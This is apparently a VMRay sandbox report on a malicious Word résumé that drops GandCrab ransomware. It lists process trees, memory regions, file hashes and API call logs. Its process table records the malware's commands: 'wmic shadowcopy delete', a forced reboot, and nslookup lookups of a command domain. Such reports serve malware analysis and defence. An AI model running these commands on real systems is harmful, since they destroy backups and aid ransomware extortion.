Encrypted Doc Dropping GandCrab v3.0.1 | Sequential Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Target: win7_64_sp1-mso2016 | ms_office
Classification: Dropper, Trojan, Downloader, Ransomware

be54bb05adbda29316ba03d61b3365d8a03e1121a39ae492078787aff4f1248f (SHA256)

Faith's Resume.doc

Word Document

Created at 2018-06-04 08:51:00

Notifications (2/2)

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

The operating system was rebooted during the analysis.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x924 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -
#2 0xa44 Child Process Medium qwerty.exe C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe #1
#4 0xb04 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #2
#5 0xbc4 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #2
#6 0x894 Child Process System (Elevated) wmic.exe "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete #2
#9 0x66c Child Process System (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f #2
#10 0x8d8 Child Process System (Elevated) shutdown.exe shutdown -r -t 60 -f #9
#12 0x79c Child Process System (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome #2
#13 0x244 Child Process System (Elevated) ie4uinit.exe "C:\Windows\SysWOW64\ie4uinit.exe" -ShowQLIcon #12
#14 0x49c Child Process System (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1948 CREDAT:14337 #12
#15 0xa20 Child Process System (Elevated) ssvagent.exe "C:\PROGRA~2\Java\jre7\bin\ssvagent.exe" -new #14
#25 0x7cc Autostart High (Elevated) hojffa.exe "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe" -
#27 0x418 Child Process High (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #25
#28 0x5e8 Child Process High (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #25
#29 0x614 Child Process High (Elevated) wmic.exe "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete #25
#33 0x690 Child Process High (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome #25
#34 0x22c Child Process High (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1680 CREDAT:14337 #33

Behavior Information - Sequential View

Process #1: winword.exe
305 7
»
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:15, Reason: Analysis Target
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:05:05
OS Process Information
»
Information Value
PID 0x924
Parent PID 0x5a8 (Unknown)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9B4
0x 9A4
0x 99C
0x 990
0x 988
0x 984
0x 980
0x 97C
0x 978
0x 974
0x 970
0x 96C
0x 968
0x 964
0x 960
0x 95C
0x 93C
0x 938
0x 930
0x 92C
0x 928
0x 9C8
0x 9CC
0x 9D0
0x 9D4
0x 9D8
0x 9E4
0x 9E8
0x 9EC
0x 9F0
0x 9F4
0x 9F8
0x 9FC
0x A18
0x A38
0x A3C
0x A40
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000000000020000 0x00020000 0x00020fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000040000 0x00040000 0x00043fff Pagefile Backed Memory Readable False False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable False False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f6fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000100000 0x00100000 0x00101fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable False False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable False False False -
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000150000 0x00150000 0x00152fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000160000 0x00160000 0x00161fff Pagefile Backed Memory Readable False False False -
private_0x0000000000170000 0x00170000 0x0017ffff Private Memory - False False False -
pagefile_0x0000000000180000 0x00180000 0x00182fff Pagefile Backed Memory Readable False False False -
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable False False False -
private_0x0000000000290000 0x00290000 0x0038ffff Private Memory Readable, Writable False False False -
private_0x0000000000390000 0x00390000 0x0048ffff Private Memory Readable, Writable False False False -
private_0x0000000000490000 0x00490000 0x0058ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000590000 0x00590000 0x00592fff Pagefile Backed Memory Readable False False False -
pagefile_0x00000000005a0000 0x005a0000 0x005a2fff Pagefile Backed Memory Readable False False False -
pagefile_0x00000000005b0000 0x005b0000 0x005b2fff Pagefile Backed Memory Readable False False False -
private_0x00000000005c0000 0x005c0000 0x005cffff Private Memory Readable, Writable False False False -
pagefile_0x00000000005d0000 0x005d0000 0x005d2fff Pagefile Backed Memory Readable False False False -
private_0x00000000005f0000 0x005f0000 0x005fffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000600000 0x00600000 0x00787fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000790000 0x00790000 0x00910fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000920000 0x00920000 0x01d1ffff Pagefile Backed Memory Readable False False False -
sortdefault.nls 0x01d20000 0x01feefff Memory Mapped File Readable False False False -
pagefile_0x0000000001ff0000 0x01ff0000 0x023e2fff Pagefile Backed Memory Readable False False False -
private_0x00000000023f0000 0x023f0000 0x025effff Private Memory Readable, Writable False False False -
private_0x00000000025f0000 0x025f0000 0x0262ffff Private Memory Readable, Writable False False False -
private_0x00000000026a0000 0x026a0000 0x026affff Private Memory Readable, Writable False False False -
private_0x00000000026b0000 0x026b0000 0x026b0fff Private Memory Readable, Writable False False False -
pagefile_0x00000000026c0000 0x026c0000 0x026c0fff Pagefile Backed Memory Readable False False False -
private_0x00000000026d0000 0x026d0000 0x0274ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002750000 0x02750000 0x0282efff Pagefile Backed Memory Readable False False False -
private_0x0000000002830000 0x02830000 0x0292ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002930000 0x02930000 0x02930fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002940000 0x02940000 0x02940fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002950000 0x02950000 0x02954fff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000000002960000 0x02960000 0x02960fff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000000002970000 0x02970000 0x02971fff Pagefile Backed Memory Readable False False False -
index.dat 0x02980000 0x0298bfff Memory Mapped File Readable, Writable False False False -
private_0x0000000002990000 0x02990000 0x02a8ffff Private Memory Readable, Writable False False False -
kernelbase.dll.mui 0x02a90000 0x02b4ffff Memory Mapped File Readable, Writable False False False -
index.dat 0x02bc0000 0x02bc7fff Memory Mapped File Readable, Writable False False False -
index.dat 0x02bd0000 0x02bdffff Memory Mapped File Readable, Writable False False False -
private_0x0000000002be0000 0x02be0000 0x02cdffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002ce0000 0x02ce0000 0x02ce0fff Pagefile Backed Memory Readable False False False -
private_0x0000000002cf0000 0x02cf0000 0x02cf0fff Private Memory Readable, Writable False False False -
private_0x0000000002d00000 0x02d00000 0x02d00fff Private Memory Readable, Writable False False False -
private_0x0000000002e10000 0x02e10000 0x02e8ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002e90000 0x02e90000 0x02e91fff Pagefile Backed Memory Readable False False False -
msxml6r.dll 0x02ea0000 0x02ea0fff Memory Mapped File Readable False False False -
private_0x0000000002eb0000 0x02eb0000 0x02faffff Private Memory Readable, Writable False False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x02fb0000 0x02fcffff Memory Mapped File Readable False False False -
private_0x0000000002fd0000 0x02fd0000 0x030cffff Private Memory Readable, Writable False False False -
pagefile_0x00000000030d0000 0x030d0000 0x034cffff Pagefile Backed Memory Readable False False False -
pagefile_0x00000000034d0000 0x034d0000 0x034d0fff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x00000000034e0000 0x034e0000 0x034e1fff Pagefile Backed Memory Readable False False False -
private_0x00000000034f0000 0x034f0000 0x035effff Private Memory Readable, Writable False False False -
segoeui.ttf 0x035f0000 0x0366efff Memory Mapped File Readable False False False -
private_0x0000000003670000 0x03670000 0x0368efff Private Memory Readable, Writable False False False -
c_1255.nls 0x03690000 0x036a0fff Memory Mapped File Readable False False False -
private_0x00000000036b0000 0x036b0000 0x037affff Private Memory Readable, Writable False False False -
private_0x00000000037b0000 0x037b0000 0x038affff Private Memory Readable, Writable False False False -
pagefile_0x00000000038b0000 0x038b0000 0x038b0fff Pagefile Backed Memory Readable False False False -
tahoma.ttf 0x038c0000 0x0396afff Memory Mapped File Readable False False False -
private_0x0000000003980000 0x03980000 0x0398ffff Private Memory Readable, Writable False False False -
private_0x0000000003a10000 0x03a10000 0x03b0ffff Private Memory Readable, Writable False False False -
private_0x0000000003b60000 0x03b60000 0x03bdffff Private Memory Readable, Writable, Executable False False False -
private_0x0000000003be0000 0x03be0000 0x03fdffff Private Memory Readable, Writable False False False -
private_0x00000000040c0000 0x040c0000 0x041bffff Private Memory Readable, Writable False False False -
private_0x00000000041c0000 0x041c0000 0x042bffff Private Memory Readable, Writable False False False -
private_0x00000000042c0000 0x042c0000 0x043bffff Private Memory Readable, Writable False False False -
private_0x00000000043d0000 0x043d0000 0x044cffff Private Memory Readable, Writable False False False -
private_0x00000000044e0000 0x044e0000 0x045dffff Private Memory Readable, Writable False False False -
private_0x00000000045f0000 0x045f0000 0x045fffff Private Memory Readable, Writable False False False -
private_0x0000000004680000 0x04680000 0x0477ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000004780000 0x04780000 0x04f7ffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000000004f80000 0x04f80000 0x052c2fff Pagefile Backed Memory Readable False False False -
private_0x00000000053a0000 0x053a0000 0x0541ffff Private Memory Readable, Writable False False False -
private_0x0000000005420000 0x05420000 0x0551ffff Private Memory Readable, Writable False False False -
private_0x0000000005670000 0x05670000 0x0576ffff Private Memory Readable, Writable False False False -
private_0x0000000005860000 0x05860000 0x0595ffff Private Memory Readable, Writable False False False -
private_0x0000000005a00000 0x05a00000 0x05afffff Private Memory Readable, Writable False False False -
private_0x0000000005b10000 0x05b10000 0x05b1ffff Private Memory Readable, Writable False False False -
staticcache.dat 0x05b20000 0x0644ffff Memory Mapped File Readable False False False -
private_0x00000000064c0000 0x064c0000 0x065bffff Private Memory Readable, Writable False False False -
private_0x00000000065c0000 0x065c0000 0x066bffff Private Memory Readable, Writable False False False -
private_0x0000000006730000 0x06730000 0x067affff Private Memory Readable, Writable False False False -
private_0x00000000067e0000 0x067e0000 0x068dffff Private Memory Readable, Writable False False False -
private_0x0000000006970000 0x06970000 0x0697ffff Private Memory Readable, Writable False False False -
private_0x0000000006980000 0x06980000 0x0717ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000007180000 0x07180000 0x0817ffff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000008240000 0x08240000 0x082bffff Private Memory Readable, Writable False False False -
private_0x0000000008300000 0x08300000 0x0837ffff Private Memory Readable, Writable False False False -
private_0x00000000084b0000 0x084b0000 0x0852ffff Private Memory Readable, Writable False False False -
private_0x0000000008530000 0x08530000 0x0892ffff Private Memory Readable, Writable False False False -
private_0x0000000008930000 0x08930000 0x08d30fff Private Memory Readable, Writable False False False -
private_0x0000000008d40000 0x08d40000 0x09140fff Private Memory Readable, Writable False False False -
private_0x0000000009150000 0x09150000 0x09550fff Private Memory Readable, Writable False False False -
private_0x0000000009560000 0x09560000 0x0975ffff Private Memory Readable, Writable False False False -
private_0x0000000009760000 0x09760000 0x0a760fff Private Memory Readable, Writable False False False -
private_0x000000000a770000 0x0a770000 0x0ac2cfff Private Memory Readable, Writable False False False -
private_0x000000000ac30000 0x0ac30000 0x0b02ffff Private Memory Readable, Writable False False False -
private_0x000000000b030000 0x0b030000 0x0bffffff Private Memory Readable, Writable False False False -
private_0x000000000c130000 0x0c130000 0x0c22ffff Private Memory Readable, Writable False False False -
pagefile_0x000000000c230000 0x0c230000 0x0ca2ffff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000036e00000 0x36e00000 0x36e0ffff Private Memory Readable, Writable, Executable False False False -
private_0x0000000036f30000 0x36f30000 0x36f3ffff Private Memory Readable, Writable, Executable False False False -
osppc.dll 0x74460000 0x74492fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76cd0000 0x76deefff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76df0000 0x76ee9fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x770b0000 0x770b6fff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x770c0000 0x770c2fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable False False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable False False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable False False False -
winword.exe 0x13f6d0000 0x13f8abfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000007febcee0000 0x7febcee0000 0x7febceeffff Private Memory Readable, Writable, Executable False False False -
private_0x000007febe330000 0x7febe330000 0x7febe33ffff Private Memory Readable, Writable, Executable False False False -
ivy.dll 0x7fee38c0000 0x7fee3b14fff Memory Mapped File Readable, Writable, Executable False False False -
chart.dll 0x7fee3b20000 0x7fee48f5fff Memory Mapped File Readable, Writable, Executable False False False -
msptls.dll 0x7fee4900000 0x7fee4a73fff Memory Mapped File Readable, Writable, Executable False False False -
adal.dll 0x7fee4a80000 0x7fee4b99fff Memory Mapped File Readable, Writable, Executable False False False -
riched20.dll 0x7fee4ba0000 0x7fee4e3afff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x7fee4e40000 0x7fee4ed8fff Memory Mapped File Readable, Writable, Executable False False False -
mscoree.dll 0x7fee4ee0000 0x7fee4f4efff Memory Mapped File Readable, Writable, Executable False False False -
d3d10warp.dll 0x7fee5070000 0x7fee523ffff Memory Mapped File Readable, Writable, Executable False False False -
msointl.dll 0x7fee5240000 0x7fee53dcfff Memory Mapped File Readable, Writable, Executable False False False -
msores.dll 0x7fee53e0000 0x7fee97c6fff Memory Mapped File Readable, Writable, Executable False False False -
mso99lres.dll 0x7fee97d0000 0x7feea4c4fff Memory Mapped File Readable, Writable, Executable False False False -
mso40uires.dll 0x7feea4d0000 0x7feea90cfff Memory Mapped File Readable, Writable, Executable False False False -
mso.dll 0x7feea910000 0x7feec33bfff Memory Mapped File Readable, Writable, Executable False False False -
mso98win32client.dll 0x7feec340000 0x7feecfe6fff Memory Mapped File Readable, Writable, Executable False False False -
mso40uiwin32client.dll 0x7feecff0000 0x7feedabefff Memory Mapped File Readable, Writable, Executable False False False -
mso30win32client.dll 0x7feedac0000 0x7feee1a3fff Memory Mapped File Readable, Writable, Executable False False False -
mso20win32client.dll 0x7feee1b0000 0x7feee652fff Memory Mapped File Readable, Writable, Executable False False False -
oart.dll 0x7feee660000 0x7feef5e4fff Memory Mapped File Readable, Writable, Executable False False False -
wwlib.dll 0x7feef5f0000 0x7fef1dc8fff Memory Mapped File Readable, Writable, Executable False False False -
dwrite.dll 0x7fef1e50000 0x7fef1fcdfff Memory Mapped File Readable, Writable, Executable False False False -
wwintl.dll 0x7fef1fd0000 0x7fef208ffff Memory Mapped File Readable, Writable, Executable False False False -
d2d1.dll 0x7fef2090000 0x7fef2171fff Memory Mapped File Readable, Writable, Executable False False False -
mso50win32client.dll 0x7fef2180000 0x7fef220afff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 344 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\local\temp\qwerty.exe 233.01 KB MD5: 768f77e57ea0ebe6c13060b74653b32f
SHA1: c7834bf82fa64a192a259bfb79a0892d230278da
SHA256: 589e188602c4a24c68bc095c1105894a5e97e1df6218eaead89b7ab9a4e88eac
False
Threads
Thread 0x928
305 7
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:51:30 (UTC) True 1
Fn
System Get Time type = Ticks, time = 90667 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\program files\microsoft office\root\office16\winword.exe, base_address = 0x13f6d0000 True 1
Fn
Module Load module_name = Comctl32.dll, base_address = 0x7fefb970000 True 1
Fn
Module Get Handle module_name = MSI.DLL, base_address = 0x7fef9b60000 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7fef9be3b3c True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7fef9bda13c True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7fef9be1618 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7fef9bdf088 True 1
Fn
Module Get Handle module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 False 1
Fn
Module Load module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee2c90000 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoVBADigSigCallDlg, address_out = 0x7fee2d972c0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoVbaInitSecurity, address_out = 0x7fee2d060b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFIEPolicyAndVersion, address_out = 0x7fee2cb1a60 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee2d05f50 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFInitOffice, address_out = 0x7fee2caf000 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoUninitOffice, address_out = 0x7fee2c9e860 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFGetFontSettings, address_out = 0x7fee2c93fc0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoRgchToRgwch, address_out = 0x7fee2ca2380 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoHrSimpleQueryInterface, address_out = 0x7fee2c97b80 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoHrSimpleQueryInterface2, address_out = 0x7fee2c97b20 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFCreateControl, address_out = 0x7fee2c98730 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFLongLoad, address_out = 0x7fee2dd3260 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFLongSave, address_out = 0x7fee2dd3280 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFGetTooltips, address_out = 0x7fee2ca1f40 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFSetTooltips, address_out = 0x7fee2d06370 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFLoadToolbarSet, address_out = 0x7fee2cf4590 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFCreateToolbarSet, address_out = 0x7fee2c955b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoHpalOffice, address_out = 0x7fee2ca0240 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFWndProcNeeded, address_out = 0x7fee2c93d10 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFWndProc, address_out = 0x7fee2c96d30 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFCreateITFCHwnd, address_out = 0x7fee2c93d40 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoDestroyITFC, address_out = 0x7fee2c9e6f0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee2c9df40 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFGetComponentManager, address_out = 0x7fee2c97bf0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee2c9fcd0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoWideCharToMultiByte, address_out = 0x7fee2c98b20 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoHrRegisterAll, address_out = 0x7fee2d92ef0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFSetComponentManager, address_out = 0x7fee2ca42c0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFCreateStdComponentManager, address_out = 0x7fee2c93e20 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFHandledMessageNeeded, address_out = 0x7fee2c9ab10 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoPeekMessage, address_out = 0x7fee2c9a7d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFCreateIPref, address_out = 0x7fee2c91550 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoDestroyIPref, address_out = 0x7fee2c9e830 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoChsFromLid, address_out = 0x7fee2c913d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoCpgFromChs, address_out = 0x7fee2c96660 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoSetLocale, address_out = 0x7fee2c91500 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee2c93dd0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoSetVbaInterfaces, address_out = 0x7fee2d971e0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsoGetControlInstanceId, address_out = 0x7fee2d66d10 True 1
Fn
Module Get Address module_name = Unknown module name, function = VbeuiFIsEdpEnabled, address_out = 0x7fee2dd98e0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VbeuiEnterpriseProtect, address_out = 0x7fee2dd9830 True 1
Fn
Environment Get Environment String name = DDRYBUR False 1
Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1
Fn
Module Load module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL, base_address = 0x7fef5e70000 True 1
Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Licenses True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } False 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x7fefe910000 True 1
Fn
Module Get Address module_name = Unknown module name, function = SysFreeString, address_out = 0x7fefe911320 True 1
Fn
Module Get Address module_name = Unknown module name, function = LoadTypeLib, address_out = 0x7fefe91f1e0 True 1
Fn
Module Get Address module_name = Unknown module name, function = RegisterTypeLib, address_out = 0x7fefe96caa0 True 1
Fn
Module Get Address module_name = Unknown module name, function = QueryPathOfRegTypeLib, address_out = 0x7fefe9a1760 True 1
Fn
Module Get Address module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7fefe9a20d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = OleTranslateColor, address_out = 0x7fefe93c760 True 1
Fn
Module Get Address module_name = Unknown module name, function = OleCreateFontIndirect, address_out = 0x7fefe96ecd0 True 1
Fn
Module Get Address module_name = Unknown module name, function = OleCreatePictureIndirect, address_out = 0x7fefe96e840 True 1
Fn
Module Get Address module_name = Unknown module name, function = OleLoadPicture, address_out = 0x7fefe97f420 True 1
Fn
Module Get Address module_name = Unknown module name, function = OleCreatePropertyFrameIndirect, address_out = 0x7fefe974ec0 True 1
Fn
Module Get Address module_name = Unknown module name, function = OleCreatePropertyFrame, address_out = 0x7fefe979350 True 1
Fn
Module Get Address module_name = Unknown module name, function = OleIconToCursor, address_out = 0x7fefe946e40 True 1
Fn
Module Get Address module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7fefe91a550 True 1
Fn
Module Get Address module_name = Unknown module name, function = OleLoadPictureEx, address_out = 0x7fefe97f320 True 1
Fn
Window Create class_name = ThunderMain, wndproc_parameter = 0 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\system32\user32.dll, base_address = 0x76df0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x76e094f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x76e05f08 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x76e02b00 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x76dfab64 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x76e05c30 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x76dfa730 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x76dfa5b4 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = oleaut32.dll, base_address = 0x7fefe910000 True 1
Fn
Module Get Address module_name = Unknown module name, function = DispCallFunc, address_out = 0x7fefe912270 True 1
Fn
Module Get Address module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7fefe91a550 True 1
Fn
Module Get Address module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7fefe9a20d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7fefe99dbd0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7fefe915c90 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7fefe916330 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7fefe9366c0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7fefe914710 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7fefe9148f0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7fefe94b640 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7fefe94b360 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7fefe952640 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7fefe9358a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7fefe935820 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7fefe94af20 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7fefe96a0c0 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7fefe9a2160 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7fefe935af0 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7fefe935a90 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7fefe935a60 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7fefe935a30 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7fefe9160b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7fefe913e90 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7fefe969f80 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormat, address_out = 0x7fefe999b20 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7fefe999aa0 True 1
Fn
